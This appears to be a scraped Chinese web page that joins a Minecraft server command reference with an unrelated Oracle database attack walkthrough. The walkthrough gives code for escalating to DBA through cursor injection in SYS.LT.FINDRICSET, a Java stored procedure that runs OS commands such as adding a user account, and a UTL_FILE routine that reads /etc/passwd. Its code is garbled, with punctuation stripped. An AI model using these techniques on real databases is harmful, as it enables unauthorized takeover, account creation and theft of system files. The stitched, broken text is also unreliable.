传送到主城
/register
密码
#注册账号
/login
密码
#登陆账号
/money
#查看金钱
/psy
名字
钱数
给予别人金钱
/sethome
#设置自己的家
/home
#回到自己设置的家
/spawn
#传送到出生点
/back
#回到上一次传送点(例如死后回尸体处)
[private]
物品上锁
把木牌放到箱子前,输入:
第一行:[Private]
第二行:空
第三行:可以用这个箱子的其他人
第四行:可以用这个箱子的其他人
/getpos
#显示坐标
/setwarp
[warp点]
#设置公共传送点
/warp
[warp点]
#传送到指定传送点
/tpa
<玩家ID>
#请求传送到玩家player所在位置
/tpahere
<玩家ID>
#请求玩家player传送到自己所在位置
/tpaccept
#接受玩家传送的请求
/tpdeny
#拒绝玩家传送的请求
/res
create
[领地名]
-
选择好区域后创建一个叫做[领地名]的领地
/res
remove
[领地名]
-
移除一个叫[领地名]的领地
/res
removeall
-
移除所有领地
/res
subzone
<领地名>
[子区域名]
-
在领地内创建一块子区域,你必须是所有者才行。
/res
info
[领地名]
-
查询领地权限
以下为权限设置(true为开启,false为关闭)
/res
set
【领地】
【具体权限】
true/false
将你的领地设定权限是否开启
/res
pset
【领地】
【玩家名字】
【具体权限】
true/false
将你的领地开放或关闭给某玩家一个具体的权限
admin:领地的全权管理权限,仅能给与某玩家
container:是否能使用箱子,发射器等
bucket:设置是否能使用桶
ignite:点火的权限
piston:活塞是否能使用
build:建造权限(包括destroy和place)
destroy:毁坏权限
place:放置权限e
move:进入权限
tp:传送权限
use:使用权限(工作台,炉子等)
subzone:是否能设置子空间
tnt:设置tnt是否有效
creeper:设置JJ怪是否有效(设置F的话JJ怪就废了)
damage:设置领地内是否能造成伤害(不能防止被挤死)
monsters:设置是否刷新怪物
animals:设置是否刷新动物
firespread:火是否能蔓延
flow:液体流动,包括waterflow和lavaflow
waterflow:水的流动
lavaflow:岩浆流动
healing:设置是否能恢复生命
pvp:设置是否能pvp
求采纳
服务器CMD设置:在开启服务器后有一个CMD指令框,玩家们只要在CMD中输入OP 玩家ID,即可给这名玩家添加OP权限。游戏中添加:游戏中持有OP权限的玩家,可以在对话框中输入/op 玩家ID,来给予其他玩家OP权限。
服务器文件修改:在服务器文件列表中有一个Ops.txt的文件夹,在文件夹中输入需要OP权限的玩家ID保存即可。游戏创始人为马库斯·佩尔松,也称为notch,其灵感源于《无尽矿工》、《矮人要塞》和《地下城守护者》。
玩家可以在游戏中的三维空间里创造和破坏各种各样的方块,甚至在多人服务器与单人世界中体验不同的游戏模式,在高度的自由中,玩家们也自己创作出了大大小小的玩法,打造精美的建筑物,创造物和艺术品。且游戏平台已囊括了移动设备和游戏主机。
很快便连接上oracle服务器 此时发现
连接后不是dba权限
不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限
运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络
幸运的是
运行
create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate preturn end
成功!这个用户具有create proceduce权限
此时马上想到创建java扩展执行命令
create or replace and pile java source named LinxUtil as import java io *public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) )String stemp str= while ((stemp = myReader readLine()) != null) str +=stemp+ myReader close()return str} catch (Exception e){return e toString()}}}
begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <>execute )end
create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String
select * from all_objects where object_name like %LINX%
grant all on LinxRunCMD to public
select LinxRunCMD( cmd /c net user linx /add ) from dual
但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!
还好 我们还有UTL库可以利用
create or replace function LinxUTLReadfile (filename varchar ) return varchar is
fHandler UTL_FILE FILE_TYPE
buf varchar ( )
output varchar ( )
BEGIN
fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r )
loop
begin
utl_file get_line(fHandler buf)
DBMS_OUTPUT PUT_LINE( Cursor: ||buf)
exception
when no_data_found then exit
end
output := output||buf||chr( )
end loop
UTL_FILE FCLOSE(fHandler)
return output
END
UTL_FILE_DIR需要先用
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc
指定目 但运行后发现没有权限 只好想办法提权
***************游标注射***************
老外写了N个pdf介绍这技术 我精简了代码
DECLARE
MYC NUMBER
BEGIN
MYC := DBMS_SQL OPEN_CURSOR
DBMS_SQL PARSE(MYC declare pragma autonomous_transactionbegin execute immediate GRANT DBA TO linxlinx_current_db_user mitend)
DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)
BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x )END
raise NO_DATA_FOUND
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)
WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)
END
运行后重新连接就有dba权限了 简单吧……
现在可以读取文件了
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc
select LinxUTLReadfile( passwd ) from dual
lishixinzhi/Article/program/Oracle/201311/16747
欢迎分享,转载请注明来源:夏雨云
评论列表(0条)